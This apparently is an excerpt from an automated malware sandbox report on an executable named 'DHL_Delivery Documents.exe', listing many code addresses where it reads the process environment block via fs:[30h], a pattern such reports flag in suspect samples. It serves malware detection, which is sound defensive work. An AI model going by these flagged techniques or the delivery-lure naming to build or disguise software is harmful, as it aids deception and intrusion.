            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CBA118 mov eax, dword ptr fs:[00000030h]8_2_01CBA118
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CD0115 mov eax, dword ptr fs:[00000030h]8_2_01CD0115
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C40124 mov eax, dword ptr fs:[00000030h]8_2_01C40124
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C920DE mov eax, dword ptr fs:[00000030h]8_2_01C920DE
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C0A0E3 mov ecx, dword ptr fs:[00000030h]8_2_01C0A0E3
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C180E9 mov eax, dword ptr fs:[00000030h]8_2_01C180E9
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C960E0 mov eax, dword ptr fs:[00000030h]8_2_01C960E0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C0C0F0 mov eax, dword ptr fs:[00000030h]8_2_01C0C0F0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C520F0 mov ecx, dword ptr fs:[00000030h]8_2_01C520F0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C1208A mov eax, dword ptr fs:[00000030h]8_2_01C1208A
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C080A0 mov eax, dword ptr fs:[00000030h]8_2_01C080A0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CA80A8 mov eax, dword ptr fs:[00000030h]8_2_01CA80A8
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CD60B8 mov eax, dword ptr fs:[00000030h]8_2_01CD60B8
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CD60B8 mov ecx, dword ptr fs:[00000030h]8_2_01CD60B8
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C12050 mov eax, dword ptr fs:[00000030h]8_2_01C12050
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C96050 mov eax, dword ptr fs:[00000030h]8_2_01C96050
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C3C073 mov eax, dword ptr fs:[00000030h]8_2_01C3C073
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C94000 mov ecx, dword ptr fs:[00000030h]8_2_01C94000
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CB2000 mov eax, dword ptr fs:[00000030h]8_2_01CB2000
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CB2000 mov eax, dword ptr fs:[00000030h]8_2_01CB2000
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CB2000 mov eax, dword ptr fs:[00000030h]8_2_01CB2000
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CB2000 mov eax, dword ptr fs:[00000030h]8_2_01CB2000
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CB2000 mov eax, dword ptr fs:[00000030h]8_2_01CB2000
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CB2000 mov eax, dword ptr fs:[00000030h]8_2_01CB2000
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CB2000 mov eax, dword ptr fs:[00000030h]8_2_01CB2000
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CB2000 mov eax, dword ptr fs:[00000030h]8_2_01CB2000
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C2E016 mov eax, dword ptr fs:[00000030h]8_2_01C2E016
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C2E016 mov eax, dword ptr fs:[00000030h]8_2_01C2E016
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C2E016 mov eax, dword ptr fs:[00000030h]8_2_01C2E016
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C2E016 mov eax, dword ptr fs:[00000030h]8_2_01C2E016
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C0A020 mov eax, dword ptr fs:[00000030h]8_2_01C0A020
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C0C020 mov eax, dword ptr fs:[00000030h]8_2_01C0C020
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CA6030 mov eax, dword ptr fs:[00000030h]8_2_01CA6030
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CCC3CD mov eax, dword ptr fs:[00000030h]8_2_01CCC3CD
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C1A3C0 mov eax, dword ptr fs:[00000030h]8_2_01C1A3C0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C1A3C0 mov eax, dword ptr fs:[00000030h]8_2_01C1A3C0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C1A3C0 mov eax, dword ptr fs:[00000030h]8_2_01C1A3C0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C1A3C0 mov eax, dword ptr fs:[00000030h]8_2_01C1A3C0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C1A3C0 mov eax, dword ptr fs:[00000030h]8_2_01C1A3C0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C1A3C0 mov eax, dword ptr fs:[00000030h]8_2_01C1A3C0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C183C0 mov eax, dword ptr fs:[00000030h]8_2_01C183C0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C183C0 mov eax, dword ptr fs:[00000030h]8_2_01C183C0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C183C0 mov eax, dword ptr fs:[00000030h]8_2_01C183C0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C183C0 mov eax, dword ptr fs:[00000030h]8_2_01C183C0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C963C0 mov eax, dword ptr fs:[00000030h]8_2_01C963C0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CBE3DB mov eax, dword ptr fs:[00000030h]8_2_01CBE3DB
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CBE3DB mov eax, dword ptr fs:[00000030h]8_2_01CBE3DB
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CBE3DB mov ecx, dword ptr fs:[00000030h]8_2_01CBE3DB
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CBE3DB mov eax, dword ptr fs:[00000030h]8_2_01CBE3DB
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CB43D4 mov eax, dword ptr fs:[00000030h]8_2_01CB43D4
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CB43D4 mov eax, dword ptr fs:[00000030h]8_2_01CB43D4
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C203E9 mov eax, dword ptr fs:[00000030h]8_2_01C203E9
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C203E9 mov eax, dword ptr fs:[00000030h]8_2_01C203E9
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C203E9 mov eax, dword ptr fs:[00000030h]8_2_01C203E9
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C203E9 mov eax, dword ptr fs:[00000030h]8_2_01C203E9
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C203E9 mov eax, dword ptr fs:[00000030h]8_2_01C203E9
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C203E9 mov eax, dword ptr fs:[00000030h]8_2_01C203E9
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C203E9 mov eax, dword ptr fs:[00000030h]8_2_01C203E9
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C203E9 mov eax, dword ptr fs:[00000030h]8_2_01C203E9
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C2E3F0 mov eax, dword ptr fs:[00000030h]8_2_01C2E3F0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C2E3F0 mov eax, dword ptr fs:[00000030h]8_2_01C2E3F0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C2E3F0 mov eax, dword ptr fs:[00000030h]8_2_01C2E3F0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C463FF mov eax, dword ptr fs:[00000030h]8_2_01C463FF
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C0E388 mov eax, dword ptr fs:[00000030h]8_2_01C0E388
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C0E388 mov eax, dword ptr fs:[00000030h]8_2_01C0E388
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C0E388 mov eax, dword ptr fs:[00000030h]8_2_01C0E388
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C3438F mov eax, dword ptr fs:[00000030h]8_2_01C3438F
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C3438F mov eax, dword ptr fs:[00000030h]8_2_01C3438F
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C08397 mov eax, dword ptr fs:[00000030h]8_2_01C08397
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C08397 mov eax, dword ptr fs:[00000030h]8_2_01C08397
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C08397 mov eax, dword ptr fs:[00000030h]8_2_01C08397
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C92349 mov eax, dword ptr fs:[00000030h]8_2_01C92349
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C92349 mov eax, dword ptr fs:[00000030h]8_2_01C92349
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C92349 mov eax, dword ptr fs:[00000030h]8_2_01C92349
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C92349 mov eax, dword ptr fs:[00000030h]8_2_01C92349
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C92349 mov eax, dword ptr fs:[00000030h]8_2_01C92349
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C92349 mov eax, dword ptr fs:[00000030h]8_2_01C92349
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C92349 mov eax, dword ptr fs:[00000030h]8_2_01C92349
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C92349 mov eax, dword ptr fs:[00000030h]8_2_01C92349
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C92349 mov eax, dword ptr fs:[00000030h]8_2_01C92349
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C92349 mov eax, dword ptr fs:[00000030h]8_2_01C92349
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C92349 mov eax, dword ptr fs:[00000030h]8_2_01C92349
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C92349 mov eax, dword ptr fs:[00000030h]8_2_01C92349
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C92349 mov eax, dword ptr fs:[00000030h]8_2_01C92349
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C92349 mov eax, dword ptr fs:[00000030h]8_2_01C92349
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C92349 mov eax, dword ptr fs:[00000030h]8_2_01C92349
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CE634F mov eax, dword ptr fs:[00000030h]8_2_01CE634F
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C9035C mov eax, dword ptr fs:[00000030h]8_2_01C9035C
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C9035C mov eax, dword ptr fs:[00000030h]8_2_01C9035C
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C9035C mov eax, dword ptr fs:[00000030h]8_2_01C9035C
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C9035C mov ecx, dword ptr fs:[00000030h]8_2_01C9035C
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C9035C mov eax, dword ptr fs:[00000030h]8_2_01C9035C
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C9035C mov eax, dword ptr fs:[00000030h]8_2_01C9035C
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CB8350 mov ecx, dword ptr fs:[00000030h]8_2_01CB8350
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CDA352 mov eax, dword ptr fs:[00000030h]8_2_01CDA352
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CB437C mov eax, dword ptr fs:[00000030h]8_2_01CB437C
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C4A30B mov eax, dword ptr fs:[00000030h]8_2_01C4A30B
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C4A30B mov eax, dword ptr fs:[00000030h]8_2_01C4A30B
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C4A30B mov eax, dword ptr fs:[00000030h]8_2_01C4A30B
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C0C310 mov ecx, dword ptr fs:[00000030h]8_2_01C0C310
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C30310 mov ecx, dword ptr fs:[00000030h]8_2_01C30310
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CE8324 mov eax, dword ptr fs:[00000030h]8_2_01CE8324
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CE8324 mov ecx, dword ptr fs:[00000030h]8_2_01CE8324
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CE8324 mov eax, dword ptr fs:[00000030h]8_2_01CE8324
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CE8324 mov eax, dword ptr fs:[00000030h]8_2_01CE8324
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C1A2C3 mov eax, dword ptr fs:[00000030h]8_2_01C1A2C3
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C1A2C3 mov eax, dword ptr fs:[00000030h]8_2_01C1A2C3
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C1A2C3 mov eax, dword ptr fs:[00000030h]8_2_01C1A2C3
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C1A2C3 mov eax, dword ptr fs:[00000030h]8_2_01C1A2C3
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C1A2C3 mov eax, dword ptr fs:[00000030h]8_2_01C1A2C3
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CE62D6 mov eax, dword ptr fs:[00000030h]8_2_01CE62D6
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C202E1 mov eax, dword ptr fs:[00000030h]8_2_01C202E1
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C202E1 mov eax, dword ptr fs:[00000030h]8_2_01C202E1
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C202E1 mov eax, dword ptr fs:[00000030h]8_2_01C202E1
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C4E284 mov eax, dword ptr fs:[00000030h]8_2_01C4E284
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C4E284 mov eax, dword ptr fs:[00000030h]8_2_01C4E284
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C90283 mov eax, dword ptr fs:[00000030h]8_2_01C90283
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C90283 mov eax, dword ptr fs:[00000030h]8_2_01C90283
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C90283 mov eax, dword ptr fs:[00000030h]8_2_01C90283
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C202A0 mov eax, dword ptr fs:[00000030h]8_2_01C202A0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C202A0 mov eax, dword ptr fs:[00000030h]8_2_01C202A0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CA62A0 mov eax, dword ptr fs:[00000030h]8_2_01CA62A0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CA62A0 mov ecx, dword ptr fs:[00000030h]8_2_01CA62A0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CA62A0 mov eax, dword ptr fs:[00000030h]8_2_01CA62A0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CA62A0 mov eax, dword ptr fs:[00000030h]8_2_01CA62A0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CA62A0 mov eax, dword ptr fs:[00000030h]8_2_01CA62A0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CA62A0 mov eax, dword ptr fs:[00000030h]8_2_01CA62A0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C98243 mov eax, dword ptr fs:[00000030h]8_2_01C98243
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C98243 mov ecx, dword ptr fs:[00000030h]8_2_01C98243
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C0A250 mov eax, dword ptr fs:[00000030h]8_2_01C0A250
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CE625D mov eax, dword ptr fs:[00000030h]8_2_01CE625D
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C16259 mov eax, dword ptr fs:[00000030h]8_2_01C16259
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CCA250 mov eax, dword ptr fs:[00000030h]8_2_01CCA250
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CCA250 mov eax, dword ptr fs:[00000030h]8_2_01CCA250
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C14260 mov eax, dword ptr fs:[00000030h]8_2_01C14260
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C14260 mov eax, dword ptr fs:[00000030h]8_2_01C14260
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C14260 mov eax, dword ptr fs:[00000030h]8_2_01C14260
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C0826B mov eax, dword ptr fs:[00000030h]8_2_01C0826B
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CC0274 mov eax, dword ptr fs:[00000030h]8_2_01CC0274
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CC0274 mov eax, dword ptr fs:[00000030h]8_2_01CC0274
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CC0274 mov eax, dword ptr fs:[00000030h]8_2_01CC0274
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CC0274 mov eax, dword ptr fs:[00000030h]8_2_01CC0274
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CC0274 mov eax, dword ptr fs:[00000030h]8_2_01CC0274
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CC0274 mov eax, dword ptr fs:[00000030h]8_2_01CC0274
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CC0274 mov eax, dword ptr fs:[00000030h]8_2_01CC0274
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CC0274 mov eax, dword ptr fs:[00000030h]8_2_01CC0274
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CC0274 mov eax, dword ptr fs:[00000030h]8_2_01CC0274
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CC0274 mov eax, dword ptr fs:[00000030h]8_2_01CC0274
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CC0274 mov eax, dword ptr fs:[00000030h]8_2_01CC0274
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CC0274 mov eax, dword ptr fs:[00000030h]8_2_01CC0274
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C0823B mov eax, dword ptr fs:[00000030h]8_2_01C0823B
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C4E5CF mov eax, dword ptr fs:[00000030h]8_2_01C4E5CF
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C4E5CF mov eax, dword ptr fs:[00000030h]8_2_01C4E5CF
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C165D0 mov eax, dword ptr fs:[00000030h]8_2_01C165D0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C4A5D0 mov eax, dword ptr fs:[00000030h]8_2_01C4A5D0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C4A5D0 mov eax, dword ptr fs:[00000030h]8_2_01C4A5D0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C125E0 mov eax, dword ptr fs:[00000030h]8_2_01C125E0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C3E5E7 mov eax, dword ptr fs:[00000030h]8_2_01C3E5E7
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C3E5E7 mov eax, dword ptr fs:[00000030h]8_2_01C3E5E7
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C3E5E7 mov eax, dword ptr fs:[00000030h]8_2_01C3E5E7
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C3E5E7 mov eax, dword ptr fs:[00000030h]8_2_01C3E5E7
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C3E5E7 mov eax, dword ptr fs:[00000030h]8_2_01C3E5E7
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C3E5E7 mov eax, dword ptr fs:[00000030h]8_2_01C3E5E7
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C3E5E7 mov eax, dword ptr fs:[00000030h]8_2_01C3E5E7
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C3E5E7 mov eax, dword ptr fs:[00000030h]8_2_01C3E5E7
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C4C5ED mov eax, dword ptr fs:[00000030h]8_2_01C4C5ED
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C4C5ED mov eax, dword ptr fs:[00000030h]8_2_01C4C5ED
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C12582 mov eax, dword ptr fs:[00000030h]8_2_01C12582
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C12582 mov ecx, dword ptr fs:[00000030h]8_2_01C12582
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C44588 mov eax, dword ptr fs:[00000030h]8_2_01C44588
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C4E59C mov eax, dword ptr fs:[00000030h]8_2_01C4E59C
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C905A7 mov eax, dword ptr fs:[00000030h]8_2_01C905A7
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C905A7 mov eax, dword ptr fs:[00000030h]8_2_01C905A7
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C905A7 mov eax, dword ptr fs:[00000030h]8_2_01C905A7
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C345B1 mov eax, dword ptr fs:[00000030h]8_2_01C345B1
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C345B1 mov eax, dword ptr fs:[00000030h]8_2_01C345B1
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C18550 mov eax, dword ptr fs:[00000030h]8_2_01C18550
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C18550 mov eax, dword ptr fs:[00000030h]8_2_01C18550
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C4656A mov eax, dword ptr fs:[00000030h]8_2_01C4656A
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C4656A mov eax, dword ptr fs:[00000030h]8_2_01C4656A
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C4656A mov eax, dword ptr fs:[00000030h]8_2_01C4656A
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CA6500 mov eax, dword ptr fs:[00000030h]8_2_01CA6500
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CE4500 mov eax, dword ptr fs:[00000030h]8_2_01CE4500
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CE4500 mov eax, dword ptr fs:[00000030h]8_2_01CE4500
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CE4500 mov eax, dword ptr fs:[00000030h]8_2_01CE4500
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CE4500 mov eax, dword ptr fs:[00000030h]8_2_01CE4500
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CE4500 mov eax, dword ptr fs:[00000030h]8_2_01CE4500
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CE4500 mov eax, dword ptr fs:[00000030h]8_2_01CE4500
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CE4500 mov eax, dword ptr fs:[00000030h]8_2_01CE4500
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C20535 mov eax, dword ptr fs:[00000030h]8_2_01C20535
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C20535 mov eax, dword ptr fs:[00000030h]8_2_01C20535
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C20535 mov eax, dword ptr fs:[00000030h]8_2_01C20535
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C20535 mov eax, dword ptr fs:[00000030h]8_2_01C20535
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C20535 mov eax, dword ptr fs:[00000030h]8_2_01C20535
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C20535 mov eax, dword ptr fs:[00000030h]8_2_01C20535
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C3E53E mov eax, dword ptr fs:[00000030h]8_2_01C3E53E
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C3E53E mov eax, dword ptr fs:[00000030h]8_2_01C3E53E
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C3E53E mov eax, dword ptr fs:[00000030h]8_2_01C3E53E
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C3E53E mov eax, dword ptr fs:[00000030h]8_2_01C3E53E
